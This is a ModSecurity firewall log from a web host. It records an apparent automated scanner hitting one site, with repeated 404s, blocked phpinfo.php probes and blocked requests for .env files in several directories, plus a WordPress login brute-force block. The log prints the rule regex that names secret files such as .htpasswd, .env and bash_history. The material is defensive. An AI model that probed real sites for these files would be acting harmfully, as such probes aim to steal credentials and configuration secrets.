[Tue May 26 14:49:35.591274 2026] [security2:error] [pid 648203:tid 648433] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlp7EQDDtxJNiDrdTo7AAAAOk"]
[Tue May 26 14:49:35.645746 2026] [security2:error] [pid 648203:tid 648343] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlp7EQDDtxJNiDrdTo-gAAAI8"]
[Tue May 26 14:49:35.651848 2026] [security2:error] [pid 648203:tid 648367] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlp7EQDDtxJNiDrdTo-QAAAKc"]
[Tue May 26 14:49:35.656374 2026] [security2:error] [pid 648203:tid 648352] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlp7EQDDtxJNiDrdTo-wAAAJg"]
[Tue May 26 14:49:35.684366 2026] [security2:error] [pid 648203:tid 648443] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlp7EQDDtxJNiDrdTo_gAAAPM"]
[Tue May 26 14:49:35.713147 2026] [security2:error] [pid 648203:tid 648446] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlp7EQDDtxJNiDrdTpCwAAAPY"]
[Tue May 26 14:49:35.716450 2026] [security2:error] [pid 648203:tid 648413] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlp7EQDDtxJNiDrdTpBQAAANU"]
[Tue May 26 14:49:35.717950 2026] [security2:error] [pid 648203:tid 648356] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlp7EQDDtxJNiDrdTpDQAAAJw"]
[Tue May 26 14:49:35.725328 2026] [security2:error] [pid 648203:tid 648394] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlp7EQDDtxJNiDrdTpDwAAAMI"]
[Tue May 26 14:49:35.728171 2026] [security2:error] [pid 648203:tid 648437] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlp7EQDDtxJNiDrdTpDgAAAO0"]
[Tue May 26 14:49:35.833732 2026] [security2:error] [pid 648203:tid 648214] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.leakyleaks.moes-art.com"] [uri "/_profiler/phpinfo.php"] [unique_id "ahVlp7EQDDtxJNiDrdTpKAAAxQo"]
[Tue May 26 14:49:35.990680 2026] [security2:error] [pid 648203:tid 648240] [remote 163.223.13.54:53744] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 54.13.223.163.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "hassina-foundation.com"] [uri "/wp-login.php"] [unique_id "ahVlp7EQDDtxJNiDrdTpIQAA6CQ"]
[Tue May 26 14:49:36.073187 2026] [security2:error] [pid 648203:tid 648363] [client 45.3.38.236:62425] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlprEQDDtxJNiDrdTowwAAAKM"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:49:36.336113 2026] [security2:error] [pid 648203:tid 648449] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlp7EQDDtxJNiDrdTpOgAAAPk"]
[Tue May 26 14:49:36.337652 2026] [security2:error] [pid 648203:tid 648451] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlp7EQDDtxJNiDrdTpQQAAAPs"]
[Tue May 26 14:49:36.337954 2026] [security2:error] [pid 648203:tid 648350] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlp7EQDDtxJNiDrdTpHgAAAJY"]
[Tue May 26 14:49:36.338159 2026] [security2:error] [pid 648203:tid 648397] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlp7EQDDtxJNiDrdTpGwAAxR4"]
[Tue May 26 14:49:36.338965 2026] [security2:error] [pid 648203:tid 648397] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlp7EQDDtxJNiDrdTpGgAAxR0"]
[Tue May 26 14:49:36.339400 2026] [security2:error] [pid 648203:tid 648450] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlp7EQDDtxJNiDrdTpIAAAAPo"]
[Tue May 26 14:49:36.340897 2026] [security2:error] [pid 648203:tid 648397] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlp7EQDDtxJNiDrdTpIgAAxQ8"]
[Tue May 26 14:49:36.346900 2026] [security2:error] [pid 648203:tid 648391] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlp7EQDDtxJNiDrdTpHQAAAL8"]
[Tue May 26 14:49:36.349929 2026] [security2:error] [pid 648203:tid 648337] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlp7EQDDtxJNiDrdTpOAAAAIk"]
[Tue May 26 14:49:36.351080 2026] [security2:error] [pid 648203:tid 648341] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlp7EQDDtxJNiDrdTpHAAAAI0"]
[Tue May 26 14:49:36.355177 2026] [security2:error] [pid 648203:tid 648420] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlp7EQDDtxJNiDrdTpLgAAANw"]
[Tue May 26 14:49:36.358219 2026] [security2:error] [pid 648203:tid 648354] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlp7EQDDtxJNiDrdTpJwAAAJo"]
[Tue May 26 14:49:36.365534 2026] [security2:error] [pid 648203:tid 648383] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlp7EQDDtxJNiDrdTpKQAAALc"]
[Tue May 26 14:49:36.369340 2026] [security2:error] [pid 648203:tid 648375] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlp7EQDDtxJNiDrdTpLwAAAK8"]
[Tue May 26 14:49:36.375967 2026] [security2:error] [pid 648203:tid 648403] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlp7EQDDtxJNiDrdTpOwAAAMs"]
[Tue May 26 14:49:36.376393 2026] [security2:error] [pid 648203:tid 648460] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlp7EQDDtxJNiDrdTpHwAAAQQ"]
[Tue May 26 14:49:36.488277 2026] [security2:error] [pid 648203:tid 648245] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/admin-app/.env"] [unique_id "ahVlqLEQDDtxJNiDrdTpUgAAsik"]
[Tue May 26 14:49:36.506987 2026] [security2:error] [pid 648203:tid 648206] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.leakyleaks.moes-art.com"] [uri "/admin/phpinfo.php"] [unique_id "ahVlqLEQDDtxJNiDrdTpZQAAsgI"]
[Tue May 26 14:49:36.554233 2026] [security2:error] [pid 648203:tid 648378] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlqLEQDDtxJNiDrdTpVwAAsig"]
[Tue May 26 14:49:36.560138 2026] [security2:error] [pid 648203:tid 648378] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlqLEQDDtxJNiDrdTpVgAAsik"]
[Tue May 26 14:49:36.564280 2026] [security2:error] [pid 648203:tid 648429] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlqLEQDDtxJNiDrdTpYAAAAOU"]
[Tue May 26 14:49:36.567409 2026] [security2:error] [pid 648203:tid 648453] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlqLEQDDtxJNiDrdTpYgAAAP0"]
[Tue May 26 14:49:36.573173 2026] [security2:error] [pid 648203:tid 648371] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlqLEQDDtxJNiDrdTpYQAAAKs"]
[Tue May 26 14:49:36.575320 2026] [security2:error] [pid 648203:tid 648378] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlqLEQDDtxJNiDrdTpZgAAskw"]
[Tue May 26 14:49:36.576146 2026] [security2:error] [pid 648203:tid 648378] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlqLEQDDtxJNiDrdTpXwAAshE"]
[Tue May 26 14:49:36.578825 2026] [security2:error] [pid 648203:tid 648378] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlqLEQDDtxJNiDrdTpXQAAshU"]
[Tue May 26 14:49:36.581528 2026] [security2:error] [pid 648203:tid 648378] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlqLEQDDtxJNiDrdTpYwAAsiA"]
[Tue May 26 14:49:36.588392 2026] [security2:error] [pid 648203:tid 648378] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlqLEQDDtxJNiDrdTpZwAAsjU"]
[Tue May 26 14:49:36.613365 2026] [security2:error] [pid 648203:tid 648387] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlqLEQDDtxJNiDrdTpawAAALs"]
[Tue May 26 14:49:36.619934 2026] [security2:error] [pid 648203:tid 648419] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlqLEQDDtxJNiDrdTpagAAANs"]
[Tue May 26 14:49:36.631156 2026] [security2:error] [pid 648203:tid 648276] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.leakyleaks.moes-art.com"] [uri "/admin_phpinfo.php"] [unique_id "ahVlqLEQDDtxJNiDrdTpbQAAo0g"]
[Tue May 26 14:49:36.655262 2026] [security2:error] [pid 648203:tid 648271] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/api-backend/.env"] [unique_id "ahVlqLEQDDtxJNiDrdTpcAAAo0M"]
[Tue May 26 14:49:36.700483 2026] [security2:error] [pid 648203:tid 648363] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlqLEQDDtxJNiDrdTpbwAAozA"]
[Tue May 26 14:49:36.706651 2026] [security2:error] [pid 648203:tid 648226] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/api-node/.env"] [unique_id "ahVlqLEQDDtxJNiDrdTpcQAAoxY"]
[Tue May 26 14:49:36.717129 2026] [security2:error] [pid 648203:tid 648270] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/api/.env"] [unique_id "ahVlqLEQDDtxJNiDrdTpdQAAo0I"]
[Tue May 26 14:49:36.802887 2026] [security2:error] [pid 648203:tid 648287] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.leakyleaks.moes-art.com"] [uri "/api/info.php"] [unique_id "ahVlqLEQDDtxJNiDrdTpjQAAo1M"]
[Tue May 26 14:49:36.917648 2026] [security2:error] [pid 648203:tid 648267] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/administrator/.env"] [unique_id "ahVlqLEQDDtxJNiDrdTpbgAAoz8"]
[Tue May 26 14:49:36.990978 2026] [security2:error] [pid 648203:tid 648368] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlqLEQDDtxJNiDrdTpbAAAAKg"]
[Tue May 26 14:49:37.325228 2026] [security2:error] [pid 648203:tid 648408] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlqLEQDDtxJNiDrdTpeAAAANA"]
[Tue May 26 14:49:37.327581 2026] [security2:error] [pid 648203:tid 648363] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlqLEQDDtxJNiDrdTpfgAAoyU"]
[Tue May 26 14:49:37.332917 2026] [security2:error] [pid 648203:tid 648363] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlqLEQDDtxJNiDrdTpewAAo0c"]
[Tue May 26 14:49:37.333404 2026] [security2:error] [pid 648203:tid 648363] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlqLEQDDtxJNiDrdTpgQAAo0E"]
[Tue May 26 14:49:37.337309 2026] [security2:error] [pid 648203:tid 648433] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlqLEQDDtxJNiDrdTpiAAAAOk"]
[Tue May 26 14:49:37.338447 2026] [security2:error] [pid 648203:tid 648363] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlqLEQDDtxJNiDrdTpiwAAo2Y"]
[Tue May 26 14:49:37.338675 2026] [security2:error] [pid 648203:tid 648363] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlqLEQDDtxJNiDrdTpfQAAo1I"]
[Tue May 26 14:49:37.340555 2026] [security2:error] [pid 648203:tid 648342] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlqLEQDDtxJNiDrdTpgAAAAI4"]
[Tue May 26 14:49:37.361223 2026] [security2:error] [pid 648203:tid 648363] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlqLEQDDtxJNiDrdTpggAAo1E"]
[Tue May 26 14:49:37.361376 2026] [security2:error] [pid 648203:tid 648363] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlqLEQDDtxJNiDrdTplQAAo0k"]
[Tue May 26 14:49:37.363831 2026] [security2:error] [pid 648203:tid 648353] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlqLEQDDtxJNiDrdTpiQAAAJk"]
[Tue May 26 14:49:37.368571 2026] [security2:error] [pid 648203:tid 648350] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlqLEQDDtxJNiDrdTplAAAAJY"]
[Tue May 26 14:49:37.369447 2026] [security2:error] [pid 648203:tid 648363] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlqLEQDDtxJNiDrdTpfAAAo00"]
[Tue May 26 14:49:37.370868 2026] [security2:error] [pid 648203:tid 648363] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlqLEQDDtxJNiDrdTpkwAAo1k"]
